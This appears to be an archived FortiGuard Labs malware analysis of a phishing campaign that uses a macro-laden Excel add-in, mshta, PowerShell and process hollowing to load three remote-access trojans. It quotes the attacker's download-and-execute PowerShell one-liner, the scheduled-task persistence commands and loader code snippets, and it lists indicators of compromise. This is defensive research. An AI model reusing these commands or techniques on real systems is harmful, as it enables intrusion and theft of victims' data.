{
	"id": "cb979888-bd97-4d9a-ab78-f98910fe42a1",
	"created_at": "2026-04-06T00:22:19.051456Z",
	"updated_at": "2026-04-10T03:21:32.011327Z",
	"deleted_at": null,
	"sha1_hash": "3c77997543ef67e002b55b07ac947eb52145a5cb",
	"title": "Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 608007,
	"plain_text": "Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT /\r\nBitRAT / PandoraHVNC – Part I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-05-12 · Archived: 2026-04-05 16:49:32 UTC\r\nFortinet’s FortiGuard Labs captured a phishing campaign that was delivering three fileless malware onto a victim’s device.\r\nOnce executed, they are able to steal sensitive information from that device.\r\nIn this analysis, I’ll reveal how the phishing campaign manages to transfer the fileless malware to the victim’s device, what\r\nmechanism it uses to load, deploy, and execute the fileless malware in the target process, and how it maintains persistence\r\non the victim’s device.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Microsoft Windows Users\r\nImpact: Controls victim’s device and collects sensitive information\r\nSeverity level: Critical\r\nObserving the Phishing Email\r\nThe captured phishing email is shown in Figure 1.1. It was disguised as a notification of a payment report from a trusted\r\nsource. \r\nFigure 1.1 – The phishing email\r\nThis email attempts to trick the recipient into opening the attached Excel document for the report detail. As you can see, this\r\nphishing email is detected as spam by the FortiMail service and has been marked as “[SPAM detected by FortiMail]” in the\r\nSubject line to warn the recipient.\r\nLooking into the Attached Excel Document\r\nThe Excel document is named “Remittance-Details-951244.xlam”. It’s an Excel Add-In (*.xlam) file that contains malicious\r\nmacros. When the recipient starts it in the Microsoft Excel program, a security notice pops up asking the user if they want to\r\nenable the macros, as shown in Figure 2.1. 
\r\nhttps://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware\r\nPage 1 of 8\n\nFigure 2.1 – The security notice that launches when opening the Excel document\r\nIt contains an auto-start macro: a VBA (Visual Basic for Applications) method called “Auto_Open()” that runs when the\r\nExcel file is opened.\r\nGoing through the VBA code inside the method, I learned that it decodes a command string and executes it using a WMI\r\n(Windows Management Instrumentation) object.\r\nFigure 2.2 – The WMI object used to execute a decoded command\r\nFigure 2.2 is a snippet of VBA code of the method “Auto_Open()”, showing where it is about to create a WMI object to\r\nexecute the decoded string command “C:\\\\ProgramData\\\\ddond.com\r\nhxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file”, as shown at the bottom of Figure 2.2.\r\nBefore that, it copies a local file, “C:\\Windows\\System32\\mshta.exe”, into “C:\\ProgramData\\” and renames it as\r\n“ddond.com”. “mshta.exe” is a Windows-native binary file designed to execute Microsoft HTML Application (HTA) files.\r\nRemember that “C:\\ProgramData\\ddond.com” is now the duplicate of “mshta.exe”, which will be used throughout the\r\ncampaign. To confuse researchers, for example, it uses the copied “ddond.com” file rather than “mshta.exe” to download and\r\nexecute the malicious HTML file.\r\nHTML + JavaScript + PowerShell\r\nIt downloads the “APRL27.htm” file, which is parsed by “ddond.com” (i.e. “mshta.exe”). The HTML file contains a piece\r\nof JavaScript code that is encoded using the URL escape method. I decoded it and simplified the code, as shown in Figure\r\n3.1.\r\nFigure 3.1 – The simplified JavaScript code from APRL27.htm\r\nIt creates an object, “Wscript.Shell”, using the instruction below.
“Wscript.Shell” is retrieved using method\r\n“_0x5b4b3f(0x391, 0x391)”, which is used to return a string by its index.\r\nchuchukukukaokiwDasidow = new ActiveXObject(_0x5b4b3f(0x391, 0x391));\r\n“chuchukukukaokiwDasidow” is the created OS Shell object used to run an application. In Figure 3.1 we can see it runs five\r\ncommand-line applications, as follows.\r\npowershell  $MMMMMMM=((neW-ObjEcT ((\"Net.Webclient\"))).((\"Downloadstring\")).invoke(((\"hxxps[:]//taxfile[.]mediafire.com/file/175lr9wsa5n97x8/mainpw.dll/file\"))));Invoke-Expression $MMMMMMM\r\nschtasks /create /sc MINUTE /mo 82 /tn calendersw /F /tr \"\"\"%programdata%\\ddond.com \"\"\"\"\"\"\r\nhxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file\"\"\"\r\ntaskkill /f /im WinWord.exe\r\ntaskkill /f /im Excel.exe\r\ntaskkill /f /im POWERPNT.exe\r\nIt runs the PowerShell application to download a PowerShell file called “mainpw.dll” and then execute it.\r\nIt then runs schtasks to create a scheduled task named “calendersw” in the system “Task Scheduler”. It performs the\r\ncommand “C:\\ProgramData\\ddond.com hxxps[:]//www[.]mediafire.com/file/c3zcoq7ay6nql9i/back.htm/file” every 82\r\nminutes, which parses “back.htm” the same way “APRL27.htm” was parsed. It is also a persistence mechanism. Once it starts,\r\nback.htm adds more scheduled tasks.\r\nIt also runs taskkill to kill the processes, if they exist, of MS Word (WinWord.exe), MS Excel (Excel.exe), and MS PowerPoint\r\n(POWERPNT.exe).\r\nFigure 3.2 – APRL27.htm traffic\r\nFigure 3.2 is the screenshot of an HTTP proxy program showing the packets from “APRL27.htm” to “mainpw.dll” marked\r\nin the red box.
The green box (back.htm) and blue box (Start.htm) are other groups of requests from other “ddond.com”\r\ncommands started by the Task Scheduler.\r\nThe “mainpw.dll” file (size 7.58MB) is full of PowerShell code that can be split into three parts for three fileless malware.\r\nFigure 3.3 is a display of the simplified structure of “mainpw.dll”.\r\nFigure 3.3 – Outlines of the PowerShell code inside “mainpw.dll”\r\nThis code has three code segments and uses the same code logic for each malware. I’ll explain how this works for each\r\nmalware through their variables.\r\nThe first “$hexString” contains a dynamic method for performing GZip decompression.\r\nThe second “$hexString” contains dynamic PowerShell code that decompresses the malware payload and an inner\r\n.Net module file that deploys the malware payload.\r\nThe “$nona” is a huge byte array that contains the GZip-compressed malware payload. The following PowerShell\r\ncode, extracted from the second $hexString, decompresses the malware payload in $nona and the inner .Net\r\nmodule that deploys the malware payload into two local variables.\r\n[byte[]] $RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH = Get-DecompressedByteArray $nona\r\n[byte[]] $RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG = Get-DecompressedByteArray $STRDYFUGIHUYTYRTESRDYUGIRI\r\nAt the end of each malware code segment, the code calls the “Load()” method to load the inner .Net module from\r\n“$RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG”. It then calls the Invoke() method to invoke the\r\n“projFUD.PA.Execute()” function of the inner .Net module with two parameters, which are an exe file’s full path and a\r\nfileless malware payload.
Here is a piece of the PowerShell code used for the first malware.\r\n[Reflection.Assembly]::Load($RDSFGTFHYGUJHKGYFTDRSRDTFYGJUHKDDRTFYG).GetType('projFUD.PA').GetMethod('Execute').Invoke($\r\n[object[]] (\r\n'C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\aspnet_compiler.exe',$RSETDYUGUIDRSTRDYUGIHOYRTSETRTYDUGIOH))\r\nDynamic .Net Module for Process Hollowing\r\nIt is the inner .Net module that is dynamically extracted from the second $hexString variable. Its function\r\n“projFUD.PA.Execute()” is called from PowerShell, where “projFUD” is the namespace, “PA” is the class name, and\r\n“Execute()” is a member function of class “PA”. Figure 4.1 shows a debugger breaking at the entry of this function.\r\nFigure 4.1 – Break at the entry of function “projFUD.PA.Execute()”\r\nAt the bottom, in the “Locals” variable sub-tab, we see the two passed parameters. It then performs process hollowing to\r\ninject the malware payload into a newly created process of “aspnet_compiler.exe”.\r\nFigure 4.2 – Creating a suspended process\r\nThe “Execute()” function then calls the Windows API “CreateProcessA()” to create a process of “aspnet_compiler.exe” with\r\na creation flag of 0x8000004. This is a combination of CREATE_NO_WINDOW and CREATE_SUSPENDED, as shown in\r\nFigure 4.2.\r\nNext, it allocates memory inside this process and deploys the malware payload data into it. It modifies the value at memory\r\naddress 0x7EFDE008, where the process’ base address is saved in the PEB (Process Environment Block), and modifies the\r\nthread’s register context so that its EIP (Extended Instruction Pointer) points to the copied malware payload.
To finish, it needs to\r\ncall the API WriteProcessMemory() numerous times as well as the API Wow64SetThreadContext().\r\nAfter all the above steps have been completed, it finally calls the API ResumeThread() to have the process run the malware\r\npayload. Below is the code used for calling this API. “processInformation.ThreadHandle” is the thread handle of the newly\r\ncreated process.\r\nnum15 = (int)PA.LX99ujNZ7X3YScj6T4(PA.ResumeThread, PA.vgxYHnXuOV51G6NIu3(\"01001001011011100111011001101111011010110110010\r\nnew object[]\r\n{\r\n    processInformation.ThreadHandle\r\n});\r\nConclusion\r\nIn this analysis, I explained how an Excel document attached to a disguised phishing email is sent to a victim’s device and\r\nhow the malicious code inside the Excel document is automatically executed once opened by the recipient.\r\nI also showed how the VBA code leads to fetching a remote HTML file (APRL27.htm) using the copied “mshta.exe”\r\ncommand. This file contains malicious JavaScript code to be executed later. I also demonstrated how it achieves persistence\r\nby adding tasks to the system “Task Scheduler” to remain on the victim’s device.\r\nI also explained how it obtains three fileless malware in a huge downloaded PowerShell file to bypass detection, and how\r\nthese are later deployed and executed inside the target processes through Process Hollowing.
These three fileless malware\r\nare AveMariaRAT / BitRAT / PandoraHVNC.\r\nIn Part 2 of this analysis, I will focus on these three fileless malware to see what they do on the victim’s device, as well as\r\nwhat kind of data they are able to steal.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering,\r\nAntiVirus, FortiMail, FortiClient, FortiEDR services, and CDR (content disarm and reconstruction) services, as follows:\r\nAll relevant URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe phishing email with its attached malicious Excel document can be disarmed by the FortiGuard CDR (content disarm\r\nand reconstruction) service.\r\nThe captured Excel sample, the downloaded html file, and the PowerShell file with three fileless malware payload files are\r\ndetected as \"VBA/Agent.DDON!tr\", \"JS/Agent.DDON!tr.dldr\", and \"PowerShell/Agent.e535!tr\" and are blocked by the\r\nFortiGuard Antivirus service.\r\nFortiEDR detects both the Excel file and the huge PowerShell file as malicious based on their behavior.\r\nIn addition to these protections, we suggest that organizations have their end users also go through the FREE NSE\r\ntraining: NSE 1 – Information Security Awareness. 
It includes a module on Internet threats that is designed to help end users\r\nlearn how to identify and protect themselves from phishing attacks.\r\nIOCs\r\nURLs:\r\nhxxps://taxfile[.]mediafire[.]com/file/6hxdxdkgeyq0z1o/APRL27[.]htm/file\r\nhxxps://www[.]mediafire[.]com/file/c3zcoq7ay6nql9i/back[.]htm/file\r\nhxxps://www[.]mediafire[.]com/file/jjyy2npmnhx6o49/Start[.]htm/file\r\nhxxps://taxmogalupupitpamobitola[.]blogspot[.]com/atom[.]xml\r\nSample SHA-256 Involved in the Campaign:\r\n[Remittance-Details-951244-1.xlam]\r\n8007BB9CAA6A1456FFC829270BE2E62D1905D5B71E9DC9F9673DEC9AFBF13BFC\r\n[APRL27.htm]\r\nD71ADD25520799720ADD43A5F4925B796BEA11BF55644990B4B9A70B7EAEACBA\r\n[mainpw.dll]\r\n3D71A243E5D9BA44E3D71D4DA15D928658F92B2F0A220B7DEFE0136108871449\r\nRead Part II of this analysis here.\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nSource: https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware"
	],
	"report_names": [
		"phishing-campaign-delivering-fileless-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.pdf",
		"text": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.txt",
		"img": "https://archive.orkl.eu/3c77997543ef67e002b55b07ac947eb52145a5cb.jpg"
	}
}